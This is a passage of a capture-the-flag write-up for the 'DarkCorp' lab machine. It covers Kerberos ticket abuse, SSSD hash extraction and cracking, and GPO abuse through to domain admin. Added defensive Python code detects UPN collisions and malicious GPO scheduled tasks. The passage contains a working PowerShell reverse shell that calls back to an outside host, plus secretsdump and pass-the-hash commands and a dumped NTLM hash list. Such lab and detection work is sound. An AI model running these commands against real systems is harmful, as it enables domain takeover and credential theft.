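            findings.append((sam, upn, "UPN has no realm suffix"))
        owner = by_sam.get(prefix.lower())
        if owner and owner.lower() != sam.lower():
            # The UPN names a different account: enterprise-principal logons
            # for that name will resolve to this object instead.
            findings.append((sam, upn, "UPN prefix '%s' collides with account '%s'" % (prefix, owner)))
        elif prefix.lower() != sam.lower():
            findings.append((sam, upn, "UPN prefix differs from sAMAccountName"))
    return findings


# Constructed directory export (not real data); the angela.w entry reflects the
# state the directory would be in after the UPN change shown in this write-up.
SAMPLE_USERS = [
    {"sAMAccountName": "victor.r", "userPrincipalName": "victor.r@darkcorp.htb"},
    {"sAMAccountName": "john.w", "userPrincipalName": "john.w@darkcorp.htb"},
    {"sAMAccountName": "angela.w", "userPrincipalName": "angela.w.adm"},
    {"sAMAccountName": "angela.w.adm", "userPrincipalName": "angela.w.adm@darkcorp.htb"},
    {"sAMAccountName": "taylor.b", "userPrincipalName": "tb@darkcorp.htb"},
    {"sAMAccountName": "svc_acc", "userPrincipalName": ""},
]

if __name__ == "__main__":
    for sam, upn, reason in find_upn_anomalies(SAMPLE_USERS):
        print("%-14s %-28s %s" % (sam, upn, reason))
```

Scheduling this against a nightly LDAP export, and alerting on Directory Service attribute modifications of userPrincipalName by anyone other than the provisioning system, catches the change at write time rather than after the ticket has been issued. Removing the GenericWrite grant that makes the UPN writable by a regular user is the underlying fix.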

angela.w.adm

Then log in to Linux with the ticket:

export KRB5CCNAME=./angela.w.adm.ccache

# be quick; if prompted for a password, redo the UPN change steps above
ssh -K angela.w.adm@drip.darkcorp.htb

/etc/krb5.conf

Modify the local Kerberos config file:

[libdefaults]
    default_realm = DARKCORP.HTB
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    DARKCORP.HTB = {
        kdc = darkcorp.htb
        admin_server = darkcorp.htb
    }

[domain_realm]
    .darkcorp.htb = DARKCORP.HTB
    darkcorp.htb = DARKCORP.HTB

sssd

Got Linux root on the host that uses sssd; a search finds:

ls -la /var/lib/sss/
ls -la /var/lib/sss/db
strings /var/lib/sss/db/*.ldb | grep '\$6\$'

$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.
$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.

With the hash we can crack the password of another Linux admin user, taylor.b.adm:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

!QAZzaq1

taylor.b.adm to root

(The fastest way to reach this step is to brute-force taylor.b.adm's password directly once initial Linux access is obtained; an unintended route)

taylor.b.adm is in the Remote Management group, so WinRM login works

taylor.b.adm !QAZzaq1
evil-winrm -i 172.16.20.1 -u taylor.b.adm -p '!QAZzaq1'

It's also a member of gpo_manager, so the next step is clearly GPO:

gpo abuse

Standard GPO abuse; there's AV on the box, so do it remotely with pygpoabuse:

*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> Get-GPO -All

SecurityUpdates
652cae9a-4bb7-49f2-9e52-3361f33ce786

python3 pygpoabuse.py darkcorp.htb/taylor.b.adm:'!QAZzaq1' -dc-ip 172.16.20.1 -gpo-id "652CAE9A-4BB7-49F2-9E52-3361F33CE786" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('10.10.14.8',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "miao"

# refresh to execute
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> gpupdate /force
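What pygpoabuse writes into the GPO is a Group Policy Preferences scheduled-task file under SYSVOL (Machine\Preferences\ScheduledTasks\ScheduledTasks.xml): an ImmediateTaskV2 running as SYSTEM whose action launches PowerShell. That file is world-readable, so a defender can audit every GPO's ScheduledTasks.xml for exactly that shape. The following is an added example (not from the write-up or from pygpoabuse) that parses such a file and scores each task; the XML is constructed here in the GPP layout, with a placeholder in place of any encoded command.

```python
import xml.etree.ElementTree as ET

TASK_TAGS = {"Task", "TaskV2", "ImmediateTask", "ImmediateTaskV2"}
SYSTEM_ACCOUNTS = {"nt authority\\system", "system", "s-1-5-18"}
# (lower-cased substring of the Arguments element, reason reported)
ARGUMENT_INDICATORS = [
    ("-w hidden", "hidden window"),
    ("-enc", "encoded command"),
    ("iex", "Invoke-Expression"),
    ("downloadstring", "remote script download"),
    ("tcpclient", "raw TCP socket from PowerShell"),
]


def audit_scheduled_tasks_xml(xml_text):
    """Return one dict per task in a GPP ScheduledTasks.xml with the reasons it stands out."""
    root = ET.fromstring(xml_text)
    report = []
    for task in root:
        if task.tag not in TASK_TAGS:
            continue
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        reasons = []
        if task.tag.startswith("Immediate"):
            # Immediate tasks fire once at the next gpupdate: the classic one-shot payload carrier.
            reasons.append("immediate task (runs at next policy refresh)")
        if run_as.lower() in SYSTEM_ACCOUNTS:
            reasons.append("runs as SYSTEM")
        for exec_el in task.iter("Exec"):
            command = (exec_el.findtext("Command") or "").lower()
            args = (exec_el.findtext("Arguments") or "").lower()
            if "powershell" in command or "pwsh" in command:
                reasons.append("PowerShell launcher")
            for needle, reason in ARGUMENT_INDICATORS:
                if needle in args:
                    reasons.append(reason)
        report.append({"name": task.get("name"), "type": task.tag, "runAs": run_as,
                       "reasons": reasons, "score": len(reasons)})
    return report


# Constructed ScheduledTasks.xml (not a real SYSVOL file): one injected-looking
# immediate task and one ordinary maintenance task for comparison.
SAMPLE_SCHEDULED_TASKS_XML = """\
<ScheduledTasks>
  <ImmediateTaskV2 name="MyTask" changed="2025-02-11 02:10:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="MyTask" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>-nop -w hidden -enc PLACEHOLDER_BASE64</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Cleanup temp" changed="2024-11-03 09:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" name="Cleanup temp" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c del /q C:\\Windows\\Temp\\*.tmp</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

if __name__ == "__main__":
    for entry in audit_scheduled_tasks_xml(SAMPLE_SCHEDULED_TASKS_XML):
        print("%-14s %-16s score=%d %s" % (entry["name"], entry["type"], entry["score"], entry["reasons"]))
```

Pairing this with a watch on the GPO version number and the file's changed timestamp (a GPO that gains an immediate SYSTEM task minutes before gpupdate runs on a DC is the whole story above) turns the SYSVOL share into a detection source. The preventive fix is the same one BloodHound points at: nothing but Domain Admins and the provisioning pipeline should hold write access on GPOs linked to domain controllers.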

Got DC SYSTEM:

root flag

Add the user to Domain Admins directly, then dump:

ps> net group "Domain Admins" taylor.b.adm /add

python3 examples/secretsdump.py taylor.b.adm:'!QAZzaq1'@172.16.20.1 -just-dc-user Administrator

Then log in with the Administrator hash:

evil-winrm -i 172.16.20.1 -u Administrator -H fcb3ca5a19a1ccf2d14c13e8b64cde0f

hashdump

python3 examples/secretsdump.py taylor.b.adm:'!QAZzaq1'@172.16.20.1 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fcb3ca5a19a1ccf2d14c13e8b64cde0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c032c3e2657f4554bc7af108bd5ef17:::
victor.r:1103:aad3b435b51404eeaad3b435b51404ee:06207752633f7509f8e2e0d82e838699:::
svc_acc:1104:aad3b435b51404eeaad3b435b51404ee:01f55ea10774cce781a1b172478fcd25:::
john.w:1105:aad3b435b51404eeaad3b435b51404ee:b31090fdd33a4044cd815558c4d05b04:::
angela.w:1106:aad3b435b51404eeaad3b435b51404ee:957246c8137069bca672dc6aa0af7c7a:::
angela.w.adm:1107:aad3b435b51404eeaad3b435b51404ee:cf8b05d0462fc44eb783e3f423e2a138:::
taylor.b:1108:aad3b435b51404eeaad3b435b51404ee:ab32e2ad1f05dab03ee4b4d61fcb84ab:::
taylor.b.adm:14101:aad3b435b51404eeaad3b435b51404ee:0577b4b3fb172659dbac0be4554610f8:::
darkcorp.htb\eugene.b:25601:aad3b435b51404eeaad3b435b51404ee:84d9acc39d242f951f136a433328cf83:::
darkcorp.htb\bryce.c:25603:aad3b435b51404eeaad3b435b51404ee:5aa8484c54101e32418a533ad956ca60:::
DC-01$:1000:aad3b435b51404eeaad3b435b51404ee:45d397447e9d8a8c181655c27ef31d28:::
DRIP$:1601:aad3b435b51404eeaad3b435b51404ee:fa133329576858e48f4e1a8de10d7f56:::
WEB-01$:20601:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
